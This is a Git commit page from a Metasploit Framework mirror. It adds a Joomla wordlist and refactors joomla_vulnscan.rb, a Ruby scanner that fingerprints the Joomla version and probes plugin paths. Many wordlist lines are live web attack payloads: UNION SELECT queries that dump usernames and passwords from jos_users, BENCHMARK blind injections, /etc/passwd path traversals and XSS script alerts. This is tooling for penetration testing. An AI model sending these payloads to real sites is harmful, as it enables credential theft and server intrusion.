infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Code Corrections and Enhancements

bug/bundler_fix
f8lerror 2013-01-23 20:26:23 -05:00
parent 5cfe58e8d5
commit 6e94c04a52
2 changed files with 719 additions and 68 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

627
data/wordlists/joomla.txt Executable file
View File

@ -0,0 +1,627 @@
&controller=../../../../../../../../../../../../[LFI]%00
?1.5.10-x
?1.5.11-x-http_ref
?1.5.11-x-php-s3lf
?1.5.3-path-disclose
?1.5.3-spam
?1.5.8-x
?1.5.9-x
?j1012-fixate-session
?option=com_mysms&Itemid=0&task=phonebook
Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
admin/
administrator/
administrator/components/
administrator/components/com_a6mambocredits/
administrator/components/com_a6mambohelpdesk/
administrator/components/com_admin/admin.admin.html.php
administrator/components/com_astatspro/refer.php
administrator/components/com_bayesiannaivefilter/
administrator/components/com_chronocontact/excelwriter/PPS/File.php
administrator/components/com_colophon/
administrator/components/com_colorlab/
administrator/components/com_comprofiler/
administrator/components/com_comprofiler/plugin.class.php
administrator/components/com_cropimage/admin.cropcanvas.php
administrator/components/com_extplorer/
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
administrator/components/com_googlebase/
administrator/components/com_installer
administrator/components/com_jcs/
administrator/components/com_jim/
administrator/components/com_jjgallery/
administrator/components/com_joom12pic/
administrator/components/com_joomla-visites/
administrator/components/com_joomla_flash_uploader/
administrator/components/com_joomlaflashfun/
administrator/components/com_joomlaradiov5/
administrator/components/com_jpack/
administrator/components/com_jreactions/
administrator/components/com_juser/
administrator/components/com_admin/
administrator/components/com_kochsuite /
administrator/components/com_linkdirectory/
administrator/components/com_livechat/getSavedChatRooms.php
administrator/components/com_livechat/xmlhttp.php
administrator/components/com_lurm_constructor/admin.lurm_constructor.php
administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
administrator/components/com_mambelfish/
administrator/components/com_mgm/
administrator/components/com_mmp/help.mmp.php
administrator/components/com_mosmedia/
administrator/components/com_multibanners/extadminmenus.class.php
administrator/components/com_panoramic/
administrator/components/com_peoplebook/param.peoplebook.php
administrator/components/com_phpshop/toolbar.phpshop.html.php
administrator/components/com_remository/admin.remository.php
administrator/components/com_serverstat/install.serverstat.php
administrator/components/com_simpleswfupload/uploadhandler.php");
administrator/components/com_swmenupro/
administrator/components/com_treeg/
administrator/components/com_uhp/
administrator/components/com_uhp2/
administrator/components/com_webring/
administrator/components/com_wmtgallery/
administrator/components/com_wmtportfolio/
administrator/components/com_x-shop/
administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
administrator/index.php?option=com_searchlog&act=log
ajaxim/
akocomments.php
cart?Itemid=[SQLi]
component/com__brightweblinks/
component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
component/osproperty/?task=agent_register
component/quran/index.php?option=com_quran&action=viewayat&surano=
components/com_ clickheat/
components/com_5starhotels/
components/com_Jambook/jambook.php
components/com_a6mambocredits/
components/com_a6mambohelpdesk/
components/com_ab_gallery/
components/com_acajoom/
components/com_acctexp/
components/com_aclassf/
components/com_activities/
components/com_actualite/
components/com_admin/admin.admin.html.php
components/com_advancedpoll/
components/com_agora/
components/com_agoragroup/
components/com_ajaxchat/
components/com_akobook/
components/com_akocomment/
components/com_akogallery
components/com_alberghi/
components/com_allhotels/
components/com_alphacontent/
components/com_altas/
components/com_amocourse/
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
components/com_articles/
components/com_artist/
components/com_artlinks/
components/com_asortyment/
components/com_astatspro/
components/com_awesom/
components/com_babackup/
components/com_banners/
components/com_bayesiannaivefilter/
components/com_be_it_easypartner/
components/com_beamospetition/
components/com_biblestudy/
components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
components/com_blog/
components/com_bookflip/
components/com_bookjoomlas/
components/com_booklibrary/
components/com_books/
components/com_bsadv/
components/com_bsq_sitestats/
components/com_bsq_sitestats/external/rssfeed.php
components/com_bsqsitestats/
components/com_calendar/
components/com_camelcitydb2/
components/com_candle/
components/com_casino_blackjack/
components/com_casino_videopoker/
components/com_casinobase/
components/com_catalogproduction/
components/com_catalogshop/
components/com_category/
components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
components/com_chronocontact/excelwriter/PPS/File.php
components/com_cinema/
components/com_clasifier/
components/com_classifieds/
components/com_clickheat/
components/com_cloner/
components/com_cmimarketplace/
components/com_cms/
components/com_colophon/
components/com_colorlab/
components/com_competitions/
components/com_comprofiler/
components/com_comprofiler/plugin.class.php
components/com_contactinfo/
components/com_content/
components/com_cpg/cpg.php
components/com_cropimage/admin.cropcanvas.php
components/com_custompages/
components/com_cx/
components/com_d3000/
components/com_dadamail/
components/com_dailymessage/
components/com_datsogallery/
components/com_dbquery/
components/com_detail/
components/com_digistore/
components/com_directory/
components/com_djiceshoutbox/
components/com_doc/
components/com_downloads/
components/com_ds-syndicate/
components/com_dtregister/
components/com_dv/externals/phpupload/upload.php");
components/com_easybook/
components/com_emcomposer/
components/com_equotes/
components/com_estateagent/
components/com_eventing/
components/com_eventlist/
components/com_events/
components/com_ewriting/
components/com_expose/uploadimg.php
components/com_expshop/
components/com_extcalendar/
components/com_extcalendar/cal_popup.php?extmode=view&extid=
components/com_extcalendar/extcalendar.php
components/com_extended_registration/registration_detailed.inc.php
components/com_extplorer/
components/com_ezine/
components/com_ezstore/
components/com_facileforms/
components/com_fantasytournament/
components/com_faq/
components/com_feederator/includes/tmsp/add_tmsp.php
components/com_filebase/
components/com_filiale/
components/com_flashfun/
components/com_flashmagazinedeluxe/
components/com_flippingbook/
components/com_flyspray/startdown.php
components/com_fm/fm.install.php
components/com_foevpartners/
components/com_football/
components/com_formtool/
components/com_forum/
components/com_fq/
components/com_fundraiser/
components/com_galeria/
components/com_galleria/galleria.html.php
components/com_gallery/
components/com_game/
components/com_gameq/
components/com_garyscookbook/
components/com_genealogy/
components/com_geoboerse/
components/com_gigcal/
components/com_gmaps/
components/com_googlebase/
components/com_gsticketsystem/
components/com_guide/
components/com_hashcash/server.php
components/com_hbssearch/
components/com_hello_world/
components/com_hotproperties/
components/com_hotproperty/
components/com_hotspots/
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
components/com_hwdvideoshare/
components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
components/com_ice/
components/com_idoblog/
components/com_idvnews/
components/com_ignitegallery/
components/com_ijoomla_archive/
components/com_ijoomla_rss/
components/com_inter/
components/com_ionfiles/
components/com_is/
components/com_ixxocart/
components/com_jabode/
components/com_jashowcase/
components/com_jb2/
components/com_jce/
components/com_jcs/
components/com_jd-wiki/
components/com_jd-wp/
components/com_jim/
components/com_jjgallery/
components/com_jmovies/
components/com_jobline/
components/com_jombib/
components/com_joobb/
components/com_jooget/
components/com_joom12pic/
components/com_joomla-visites/
components/com_joomla_flash_uploader/
components/com_joomlaboard/
components/com_joomladate/
components/com_joomlaflashfun/
components/com_joomlalib/
components/com_joomlaradiov5/
components/com_joomlavvz/
components/com_joomlaxplorer/
components/com_joomloads/
components/com_joomradio/
components/com_joomtracker/
components/com_joovideo/
components/com_jotloader/
components/com_journal/
components/com_jpack/
components/com_jpad/
components/com_jreactions/
components/com_jreviews/scripts/xajax.inc.php
components/com_jumi/
components/com_juser/
components/com_jvideo/
components/com_k2/
components/com_kbase/
components/com_knowledgebase/fckeditor/fckeditor.js
components/com_kochsuite /
components/com_kunena/
components/com_letterman/
components/com_lexikon/
components/com_linkdirectory/
components/com_listoffreeads/
components/com_livechat/getSavedChatRooms.php
components/com_livechat/xmlhttp.php
components/com_liveticker/
components/com_lm/
components/com_lmo/
components/com_loudmounth/includes/abbc/abbc.class.php
components/com_loudmouth/
components/com_lowcosthotels/
components/com_lurm_constructor/admin.lurm_constructor.php
components/com_mad4joomla/
components/com_madeira/img.php
components/com_maianmusic/
components/com_mailarchive/
components/com_mailto/
components/com_mambatstaff/mambatstaff.php
components/com_mambelfish/
components/com_mambospgm/
components/com_mambowiki/MamboLogin.php
components/com_marketplace/
components/com_mcquiz/
components/com_mdigg/
components/com_media_library/
components/com_mediaslide/
components/com_mezun/
components/com_mgm/
components/com_minibb/
components/com_misterestate/
components/com_mmp/help.mmp.php
components/com_model/
components/com_moodle/moodle.php
components/com_moofaq/
components/com_mosmedia/
components/com_mospray/scripts/admin.php
components/com_mosres/
components/com_most/
components/com_mp3_allopass/
components/com_mtree/
components/com_mtree/img/listings/o/{id}.php
components/com_multibanners/extadminmenus.class.php
components/com_myalbum/
components/com_mycontent/
components/com_mydyngallery/
components/com_mygallery/
components/com_n-forms/
components/com_na_content/
components/com_na_mydocs/
components/com_na_newsdescription/
components/com_na_qforms/
components/com_neogallery/
components/com_neorecruit/
components/com_neoreferences/
components/com_netinvoice/
components/com_news/
components/com_news_portal/
components/com_newsflash/
components/com_nfn_addressbook/
components/com_nicetalk/
components/com_noticias/
components/com_omnirealestate/
components/com_omphotogallery/
components/com_ongumatimesheet20/
components/com_onlineflashquiz/
components/com_ownbiblio/
components/com_panoramic/
components/com_paxgallery/
components/com_paxxgallery/
components/com_pcchess/
components/com_pcchess/include.pcchess.php
components/com_pccookbook/
components/com_pccookbook/pccookbook.php
components/com_peoplebook/param.peoplebook.php
components/com_performs/
components/com_philaform/
components/com_phocadocumentation/
components/com_php/
components/com_phpshop/toolbar.phpshop.html.php
components/com_pinboard/
components/com_pms/
components/com_poll/
components/com_pollxt/
components/com_ponygallery/
components/com_portafolio/
components/com_portfol/
components/com_prayercenter/
components/com_pro_desk/
components/com_prod/
components/com_productshowcase/
components/com_profiler/
components/com_projectfork/
components/com_propertylab/
components/com_puarcade/
components/com_publication/
components/com_quiz/
components/com_rapidrecipe/
components/com_rdautos/
components/com_realestatemanager/
components/com_recly/
components/com_referenzen/
components/com_rekry/
components/com_remository/admin.remository.php
components/com_remository_files/file_image_14/1276100016shell.php
components/com_reporter/processor/reporter.sql.php
components/com_resman/
components/com_restaurante/
components/com_ricette/
components/com_rsfiles/
components/com_rsgallery/
components/com_rsgallery2/
components/com_rss/
components/com_rssreader/
components/com_rssxt/
components/com_rwcards/
components/com_school/
components/com_search/
components/com_sebercart/getPic.php?p=[LFD]%00
components/com_securityimages/
components/com_sef/
components/com_seminar/
components/com_serverstat/install.serverstat.php
components/com_sg/
components/com_simple_review/
components/com_simpleboard/
components/com_simplefaq/
components/com_simpleshop/
components/com_sitemap/sitemap.xml.php
components/com_slideshow/
components/com_smf/
components/com_smf/smf.php
components/com_swmenupro/
components/com_team/
components/com_tech_article/
components/com_thopper/
components/com_thyme/
components/com_tickets/
components/com_tophotelmodule/
components/com_tour_toto/
components/com_trade/
components/com_uhp/
components/com_uhp2/
components/com_user/controller.php
components/com_users/
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
components/com_vehiclemanager/
components/com_versioning /
components/com_videodb/core/videodb.class.xml.php
components/com_virtuemart/
components/com_volunteer/
components/com_vr/
components/com_waticketsystem/
components/com_webhosting/
components/com_weblinks/
components/com_webring/
components/com_wmtgallery/
components/com_wmtportfolio/
components/com_x-shop/
components/com_xevidmegahd/
components/com_xewebtv/
components/com_xfaq/
components/com_xgallery/helpers/img.php?file=
components/com_xsstream-dm/
components/com_ynews/
components/com_yvcomment/
components/com_zoom/classes/
components/mod_letterman/
components/remository/
eXtplorer/
easyblog/entry/uncategorized
extplorer/
components/com_mtree/img/listings/o/{id}.php where {id}
includes/joomla.php
index.php/404'
index.php/?option=com_question&catID=21' and+1=0 union all
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
index.php?option=com_aardvertiser&cat_name=conf&task=<=
index.php?option=com_aardvertiser&task=
index.php?option=com_abc&view=abc&letter=AS&sectionid='
index.php?option=com_advert&id=36'
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_alfurqan15x&action=viewayat&surano=
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
index.php?option=com_annonces&view=edit&Itemid=1
index.php?option=com_articleman&task=new
index.php?option=com_bbs&bid=-1
index.php?option=com_beamospetition&startpage=3&pet=-
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_chronoconnectivity&itemid=1
index.php?option=com_chronocontact&itemid=1
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
index.php?option=com_clantools&squad=1+
index.php?option=com_clantools&task=clanwar&showgame=1+
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
index.php?option=com_commedia&task=page&commpid=21
index.php?option=com_connect&view=connect&controller=
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=[LFI]%00
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
index.php?option=com_easyfaq&task=view&contact_id=
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
index.php?option=com_equipment&task=components&id=45&sec_men_id=
index.php?option=com_equipment&view=details&id=
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
index.php?option=com_filecabinet&task=download&cid[]=7
index.php?option=com_firmy&task=section_show_set&Id=-1
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
index.php?option=com_graphics&controller=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
index.php?option=com_huruhelpdesk&view=detail
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
index.php?option=com_iproperty&view=agentproperties&id=
index.php?option=com_jacomment&view=
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jcommunity&controller=members&task=1'
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_jfuploader&Itemid=
index.php?option=com_jgen&task=view&id=
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
index.php?option=com_jimtawl&Itemid=12&task=
index.php?option=com_jmarket&controller=product&task=1'
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
index.php?option=com_jomdirectory&task=search&type=111+
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
index.php?option=com_joomla_flash_uploader&Itemid=1
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
index.php?option=com_joomtouch&controller=
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
index.php?option=com_jstore&controller=product-display&task=1'
index.php?option=com_jsubscription&controller=subscription&task=1'
index.php?option=com_jtickets&controller=ticket&task=1'
index.php?option=com_konsultasi&act=detail&sid=
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
index.php?option=com_kunena&func=userlist&search=
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
index.php?option=com_matamko&controller=
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
index.php?option=com_neorecruit&task=offer_view&id=
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
index.php?option=com_noticeboard&controller=
index.php?option=com_obsuggest&controller=
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
index.php?option=com_oziogallery&Itemid=
index.php?option=com_page&id=53
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
index.php?option=com_phocagallery&view=categories&Itemid=
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
index.php?option=com_php&file=../images/phplogo.jpg
index.php?option=com_php&file=../js/ie_pngfix.js
index.php?option=com_ponygallery&Itemid=[sqli]
index.php?option=com_products&catid=-1
index.php?option=com_products&id=-1
index.php?option=com_products&product_id=-1
index.php?option=com_products&task=category&catid=-1
index.php?option=com_properties&task=agentlisting&aid=
index.php?option=com_qcontacts&Itemid=1'
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
index.php?option=com_seyret&view=
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
index.php?option=com_smartsite&controller=
index.php?option=com_spa&view=spa_product&cid=
index.php?option=com_spidercalendar
index.php?option=com_spidercalendar&date=1'
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_staticxt&staticfile=test.php&id=1923
index.php?option=com_szallasok&mode=8&id=25 (SQL)
index.php?option=com_tag&task=tag&tag=
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
index.php?option=com_ultimateportfolio&controller=
index.php?option=com_users&view=registration
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_x-shop&action=artdetail&idd='
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
index.php?option=com_xcomp&controller=../../[LFI]%00
index.php?option=com_xvs&controller=../../[LFI]%00
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
index.php?option=com_yjcontactus&view=
index.php?option=com_youtube&id_cate=4
index.php?option=com_zina&view=zina&Itemid=9
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
index.php?search=NoGe&option=com_esearch&searchId=
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
js/index.php?option=com_socialads&view=showad&Itemid=94
libraries/joomla/utilities/compat/php50x.php
libraries/pcl/pcltar.php
libraries/phpmailer/phpmailer.php
libraries/phpxmlrpc/xmlrpcs.php
modules/mod_artuploader/upload.php");
modules/mod_as_category.php
modules/mod_calendar.php
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
modules/mod_jfancy/script.php");
modules/mod_ppc_simple_spotlight/elements/upload_file.php
modules/mod_ppc_simple_spotlight/img/
modules/mod_pxt/
modules/mod_quick_question.php
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
patch/makedown.php?arquivo=../../../../etc/passwd
plugins/content/efup_files/helper.php");
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
plugins/editors/xstandard/attachmentlibrary.php
print.php?task=person&id=36 and 1=1
templates/be2004-2/
templates/ja_purity/
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'

160
modules/auxiliary/scanner/http/joomla_vulnscan.rb
View File

@ -2,7 +2,7 @@
# $Id: joomla_vulnscan.rb
##
##
#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples.
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -21,30 +21,30 @@ class Metasploit3 < Msf::Auxiliary
super(
'Name' => 'Joomla Scanner',
'Description' => %q{
This module scans a Joomla install for information and potential vulnerabilites.
This module scans a Joomla install for information, plugins and potential vulnerabilites.
},
'Author' => [ 'f8lerror' ],
'License' => MSF_LICENSE
)
register_options(
register_options(
[
OptString.new('PATH', [ true, "The path to the Joomla install", '/']),
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']),
OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]),
OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate",
File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt")
File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")
]
)
], self.class)
end
def osfingerprint (response)
def osfingerprint(response)
if(response.headers.has_key?('Server') )
if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/)
os = "Windows"
elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/)
os = "*Nix"
os = "*Nix"
else
os = "Unknown Server Header Reporting: "+response.headers['Server']
end
@ -52,8 +52,7 @@ class Metasploit3 < Msf::Auxiliary
return os
end
def fingerprint (response, app)
def fingerprint(response, app)
if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i)
v = $1
out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}"
@ -87,58 +86,65 @@ class Metasploit3 < Msf::Auxiliary
return out
end
def run_host (ip)
tpath = datastore['PATH']
if tpath[-1,1] != '/'
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
apps = [ 'language/en-GB/en-GB.xml',
end
apps = [ 'languaage/en-GB/en-GB.xml',
'templates/system/css/system.css',
'media/system/js/mootools-more.js',
'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini']
iapps = ['robots.txt','administrator/index.php','/admin/','index.php/using-joomla/extensions/components/users-component/registration-form',
iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form',
'index.php/component/users/?view=registration','htaccess.txt']
print_status("Checking Host: #{ip} for version information")
apps.each do |app|
break if check_app(tpath,app,ip)
app_status = check_app(tpath, app, ip)
return if app_status == :abort
break if app_status
end
print_status("Scanning #{ip} for interesting pages")
vprint_status("#{peer} - Checking host for interesting pages")
iapps.each do |iapp|
scan_pages(tpath,iapp,ip)
end
if datastore['ENUMERATE']
print_status("Scanning #{ip} for plugins")
vprint_status("#{peer} - Checking host for interesting plugins")
bres = send_request_cgi({
'uri' => tpath,
'method' => 'GET',
}, 5)
return if not bres or not bres.body or not bres.code
return false if not bres or not bres.body or not bres.code
bres.body.gsub!(/[\r|\n]/, ' ')
File.open(datastore['PLUGINS'], 'rb').each_line do |bapp|
papp = bapp.chomp
plugin_search(tpath,papp,ip,bres)
end
end
end
def check_app (tpath, app, ip)
def check_app(tpath, app, ip)
res = send_request_cgi({
'uri' => "#{datastore['PATH']}" << app,
'uri' => "#{tpath}" << app,
'method' => 'GET',
}, 5)
return if not res or not res.body or not res.code
return :abort if res.nil?
return false if not res or not res.body or not res.code
vprint_status("#{peer} - Checking host for version information")
res.body.gsub!(/[\r|\n]/, ' ')
os = osfingerprint(res)
if (res.code.to_i == 200)
if (res.code == 200)
out = fingerprint(res,app)
return if not out
if(out =~ /Unknown Joomla/)
print_error("Unable to identify Joomla Version with this file #{app}")
print_error("#{peer} - Unable to identify Joomla Version with this file #{app}")
return false
else
print_good("Joomla Version:#{out} from: #{app} ")
print_good("OS: #{os}")
print_good("#{peer} - Joomla Version:#{out} from: #{app} ")
print_good("#{peer} - OS: #{os}")
report_note(
:host => ip,
:port => datastore['RPORT'],
@ -146,44 +152,50 @@ class Metasploit3 < Msf::Auxiliary
:ntype => 'Joomla Version',
:data => out
)
return true
return :next_app
end
elsif(res.code.to_i == 403 and datastore['VERBOSE'])
elsif(res.code == 403)
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
print_status("#{ip} denied access to #{url} (SSL Required)")
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
print_status("#{ip} restricted access by IP")
vprint_status("#{ip} restricted access by IP")
elsif(res.body =~ /SSL client certificate is required/)
print_status("#{ip} requires a SSL client certificate")
vprint_status("#{ip} requires a SSL client certificate")
else
print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}")
end
end
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return :abort
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return :abort
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return :abort
end
def scan_pages (tpath, iapp, ip)
def scan_pages(tpath, iapp, ip)
res = send_request_cgi({
'uri' => "#{datastore['PATH']}" << iapp,
'uri' => "#{tpath}" << iapp,
'method' => 'GET',
}, 5)
return if not res or not res.body or not res.code
return false if not res or not res.body or not res.code
res.body.gsub!(/[\r|\n]/, ' ')
if (res.code.to_i == 200)
if (res.code == 200)
